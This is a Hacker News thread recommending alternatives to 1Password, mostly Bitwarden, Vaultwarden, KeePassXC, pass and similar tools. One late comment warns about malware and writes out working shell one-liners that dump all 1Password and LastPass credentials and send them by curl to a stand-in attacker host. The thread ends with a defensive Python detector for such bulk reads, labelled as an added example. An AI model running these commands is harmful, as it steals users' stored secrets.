HACKER Q&A
📣 vasachi

Alternatives to 1Password


1Password was silently removed from Russian App Store and Play Market.

Are there any good alternatives? Or do I have to use Kaspersky's password store?


  👤 elliotpage Accepted Answer ✓
+1 to Bitwarden, and in particular the Vaultwarden implementation.

I've been self hosting it for a number of years now and have never had to think about it ever again - it works, has clients for all my platforms, never had any issues.


👤 Pooge
KeePassXC is the way to go. Install F-Droid on your Android smartphone, get KeePassDX. This way, you have a desktop and Android client.

I'd recommend setting a very strong password, with a key (you can generate one when you create the database) and a long decryption time.

If you need help setting strong passwords, I recommend EFF Dice-Generated Passphrases[1].

[1]: https://www.eff.org/dice


👤 enricozb
There's pass, a CLI password manager that's version controlled and encrypted with your PGP key: https://www.passwordstore.org/

There are also (unofficial) iOS and Android clients that sync to a git repo.


👤 andreareina
Bitwarden if you want a third-party managing your credentials, keepass if you're ok handling the syncing of your password database.

👤 deepsun
I wouldn't use any of Kaspersky's software, as their owner, Eugene Kaspersky, is literally an ex-KGB officer (if there's such a thing as ex-KGB).

https://en.wikipedia.org/wiki/Eugene_Kaspersky


👤 rcarmo
I’ve been looking at alternatives for a while, here are my notes: https://taoofmac.com/space/apps/1password

(In short, I’ve switched to Secrets while keeping an eye on new KeePass apps, because I don’t want to use or run any kind of service)


👤 kmfrk
People say a lot of nice things about Bitwarden, and it's got both self-hosting and hosted options.

TIL 1Password are also looking into a self-hosted option; maybe it'll happen if more people sign on to their survey: https://survey.1password.com/self-host/.


👤 mstef
There's a new kid in town: https://www.ctrlc.hu/~stef/blog/posts/sphinx.html

pro: it has much stronger security guarantees than the rest, it's self-hosted, but you can use other people's servers!

cons: there is no UI frontend for macs, and UI integration in browser could also be improved.

(i'm the author, ama)


👤 staticassertion
Can you use your browser's native password manager? Chrome supports syncing of passwords. Just dump a bunch of gibberish into the password field when you register and let the browser do the rest.

👤 egberts1
Last year, CtrlBlog reviewed these password savers and found KeePassXC to be usable for a self-hosted password saver server and widest-platform client usages.

- Windows

- KeePassXC Offline for Android

- iOS

- Linux

   I don’t need to use KeePass, though. There are over a dozen different forks of the KeePass project to choose from. I decided on KeePassXC for my Mac, Linux, and Windows computers; and KeePass2Android Offline for my Android phone. I decided on these two because they feel more modern and I’ve confirmed that they won’t easily suffer from synchronization conflicts.
https://www.ctrl.blog/entry/keepass-vs-bitwarden-server.html

👤 xanaxagoras
Moved to Bitwarden + Vaultwarden. It's pretty good! Firefox plugin doesn't work in private browsing. Browser plugins don't auto-sync. Other than that, I was pretty happy to ditch 1password as Agile Bits circles the drain.

👤 kappuchino
As there are many (and good) answers here, I may have missed one point - which I will raise: Check the fallback / fail scenario(s).

Here is my example: I've been using 1password since 2008ish. I've purchased every upgrade since then and even had more than one license. All was fine: Data was local, there was some backup method and some plain text export.

Some time ago, 1Password decided to go cloud and change to a subscription for using the software for new users. The client I have on my mac still works fine, but the only option was to "rent" the password management that stored my data on their servers.

The owners sugarcoated this in every way (pet peeve: talking in their mails about something completely different like recipes, then "by the way, subscription only in 3, 2, 1 ...").

I will not buy into being fully dependent on someone else when it comes to access to all of my online and offline systems. And neither should you. Same goes for any company.

So any of the suggested tools here should do two things: work independently of an online/sync connection (and be able to access/modify data until the online connection has been reestablished), and be able to export data in a format that can be transformed/read by most of the others.

I switched to my own local instance of Bitwarden (Vaultwarden) and use the client for any device I own. Switch took about half a day and I never looked back.


👤 BlackLotus89
For enterprise setups I use vaultwarden (a rust based open source bitwarden). Can do password sharing and so on

For personal use keepassxc and syncthing. Keepassdx on android.

Edit: enterprise is self hosted. Keepassxc with syncthing doesn't need hosting


👤 unnouinceput
I made my own.

After trying the usual famous ones for a test period, and not being happy with anything (cloud crap, no memory encryption, no clipboard cleaning, to just name a few), I decided to take a look at a few that were open source, learned their overall intricacies and started to code my own. At the beginning nothing fancy, just a SQLite DB and a simple focus on the name field, a system-wide shortcut for my manager to pop up and then selecting the entry. The manager would type in the username, TAB to the password field, then type the password there as well and press ENTER. That was the most rudimentary one, and whenever some new web/app was not working I would see why and extend its code/logic from there.

After like 3 months I was happy with all I needed, and very rarely, something like every 6 months, I would touch its code for a maximum of 2 days to make it work. It's been over 5 years at this point and I use it daily on the several dozen web sites / desktop apps I need. During this time I never did a full refactoring or changed its underlying business logic.

So my advice for you @vasachi, if you can, do the same. The satisfaction will be huge.


👤 monkeymonkey
Apple’s password management is getting better and now includes 2FA. I wouldn’t be surprised to see it spun out as a separate app sometime soon.

👤 iisaev
Use https://www.lesspass.com/#/ - I've found the approach very fresh. Of course, you have to be sure that the master password is not leaked, but the same is true for any stateful password manager.

The real problem though is that it does not support hardware security tokens at the moment.


👤 filt
Passbolt is open source and can be self-hosted if you don't want to (or can't) run their cloud version.

https://www.passbolt.com/

It's fully open source, with an AGPL license.

https://github.com/passbolt/


👤 neandrake
I’ve been using CodeBook for several years and have been pretty happy with it. One time cost (per OS) and can sync over WiFi or to Dropbox/google drive. No browser plugins, instead it provides a global hot key activation which authenticates you (Touch ID or password), lets you search for the account then auto-types the password. On iPhone it integrates well for providing passwords to sites and they just recently added a feature which will also auto-copy 2FA TOTP into clipboard if one exists.

https://www.zetetic.net/codebook/


👤 SahAssar
I use gopass and Gopass Bridge for password filling in firefox. It works great, and for the keys I'm using yubikeys gpg mode, so my passwords are actually locked with a hardware key.

👤 ppetty
I’ve been using an app called Secrets for iOS and macOS for close to a year. A one time purchase, easy syncing, and other items like secure notes and software licenses can be stored. They also have import from 1Password. Excellent experience so far, almost a complete 1:1 analog of 1Password. Command + \ to auto-populate fields works, maybe not as smoothly. For the money Secrets charges I’m satisfied knowing that after a year, I’m saving.

👤 KolenCh
KeePass is open source and has many third-party clients.

https://keepass.info/download.html

It supports having a key file on top of password.

It has plugins to import from 1password too:

https://keepass.info/plugins.html


👤 mkishi
Does anyone have an opinion on Enpass' trustworthiness? It's pretty sleek, and with wifi sync I don't even need a server/cloud provider... But being a commercial application I'm not sure how to weigh its security. It also seems the last public audit is from 2018.

👤 dusted
Shameless plug, and I don't sell them anymore (but you can build your own): https://finalkey.net/ is a hardware dongle that stores passwords on-device, rather than on some server online.

👤 macinjosh
This impulse to block the Russian people from using western products is really gross, IMO. What have the Russian people done to anyone? Governments are to blame for the horrors going on in Ukraine. Not some oppressed citizen who has no say in the matter.

👤 Jamie9912
I love my setup, (It's not Free).

KeePass with the database file hosted on Dropbox

On my MacBook I use Strongbox, and on my iPhone I also use Strongbox.

Strongbox supports biometric auth, and is really nice to use, and supports having the keepass database on many different cloud providers


👤 vbezhenar
I used KeePass/KeePassXC/KeePassium with iCloud Drive. This setup works, but it's cumbersome to sync. I'm migrating to iCloud Passwords right now.

👤 amisure
I'm wondering what HN thoughts are for SafeInCloud? I don't sync passwords ever, but I'm curious as to the feedback from the HN community in general.

👤 aborsy
Pass and Keepassxc. I don’t trust online websites.

👤 narenkeshav
I've been using BitWarden. It is perfect.

👤 natch
Log into another country’s app store? Is this no longer possible? Not that I would ever support using 1Password though.

👤 hk1337
Keepass is what I use now. It has variants for windows, macOS, Linux, iOS, and probably Android but I haven’t seen it.


👤 netfortius
Did you try the Aurora store, which is independent of the "location" based Google account/store?

👤 lynvingen
How secure is 1Password? I have been using it for 4 months. Should I switch to Bitwarden?

👤 mmazurki
I've been using Dashlane for a few years and I'm very happy with the service.

👤 weastur
I'm afraid there is nothing public we can trust in today's world. We see how big companies are just throwing away their users and data. So, watch to pass (CLI password manager) or KeePassXC as they sync nothing but store local, which means they can't beat you.

👤 amelius
Firefox Sync works for me.


👤 jack335
I use bitwarden.

- Open Source

- Great apps

- Great chrome & firefox addon


👤 s-xyz
Passbolt

👤 WaxedChewbacca
My leading contender is KeePassXC. https://keepassxc.org

👤 emmelaich
Just use Google's password manager. Especially if you use Android and Chrome.

So convenient and Google is trustworthy to that extent.


👤 lrvick
It is non obvious but important to understand that most password managers, such as 1password, Lastpass, and almost everything else, expose all secrets to malware in plain text any time the password database is unlocked.

Here are some trivial examples of how malware can steal credentials in bulk.

Example: Exfiltrate all plaintext credentials from 1password

```
op list items | jq -r '.[].uuid' | xargs -n1 bash -c 'op get item "$1"' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
```

Example: Exfiltrate all plaintext credentials from lastpass

```
lpass ls | grep -oP '(?<=id: )([0-9]+)' | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
```

I have seen fake password manager browser plugins deployed in the wild that phish and exfiltrate master passwords, though the above methods are even simpler as they could just run a loop waiting until a password manager is eventually unlocked.

Software-only password managers may be useful for casual personal use cases such as food delivery services or social media accounts, but are not recommended for any use cases that protect any significant value like production corporate systems, and in particular not for high-risk secrets such as cloud root account creds, TLS CAs, or crypto-asset keys (you know who you are).

I would strongly encourage for most use cases to consider secret management solutions that decrypt one credential at a time on external hardware such as Password Store backed with a Yubikey, Trezor password manager, or a Mooltipass.

These offer damage control even when your endpoint is compromised.
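A defender-side check for the bulk-read pattern described in the comment above, added here as an example and not taken from the thread or from any of the tools it mentions: it scans a constructed process-execution log (assumed format `<epoch> <user> <command>`) and flags a user whose password-manager CLI secret reads reach a threshold within a short window, which is the signature a bulk dump leaves that a single interactive lookup does not.

```python
"""Flag bursts of password-manager CLI secret reads in a process log.

Added example (not from the thread). Log format is an assumption:
one line per executed command, '<epoch seconds> <user> <command line>'.
"""
import re
from collections import defaultdict, deque

# CLI subcommands that return one decrypted credential per invocation
# (1Password v1 `op`, LastPass `lpass`, pass, Bitwarden `bw`).
SECRET_READ = re.compile(
    r"^(?:op get item|lpass show|pass show|bw get (?:item|password))\b"
)


def parse_line(line):
    """Split '<epoch> <user> <command>' into (int epoch, user, command)."""
    ts, user, cmd = line.rstrip("\n").split(" ", 2)
    return int(ts), user, cmd


def detect_bulk_reads(lines, threshold=5, window=60):
    """Return one (user, first_ts, count) alert per user whose secret reads
    inside any `window`-second span reach `threshold`.  Uses a per-user
    sliding window of timestamps, so a single lookup never trips it."""
    recent = defaultdict(deque)   # user -> timestamps of recent secret reads
    alerts, alerted = [], set()
    for line in lines:
        ts, user, cmd = parse_line(line)
        if not SECRET_READ.match(cmd):
            continue               # listing, sync, login etc. are not reads
        q = recent[user]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()            # drop reads older than the window
        if len(q) >= threshold and user not in alerted:
            alerts.append((user, q[0], len(q)))
            alerted.add(user)      # one alert per user per run
    return alerts


# Constructed sample log: alice does two normal lookups minutes apart,
# bob reads five items in five seconds right after listing the vault.
SAMPLE_LOG = [
    "1700000000 alice op get item 'GitHub'",
    "1700000300 alice lpass show 12345",
    "1700000900 bob op list items",
    "1700000901 bob op get item a1",
    "1700000902 bob op get item a2",
    "1700000903 bob op get item a3",
    "1700000904 bob op get item a4",
    "1700000905 bob op get item a5",
]

if __name__ == "__main__":
    for user, first_ts, count in detect_bulk_reads(SAMPLE_LOG):
        print(f"ALERT {user}: {count} secret reads starting at {first_ts}")
```

In practice the lines would come from auditd, EDR process telemetry or shell history; the threshold should sit above the rate a human reaches by hand.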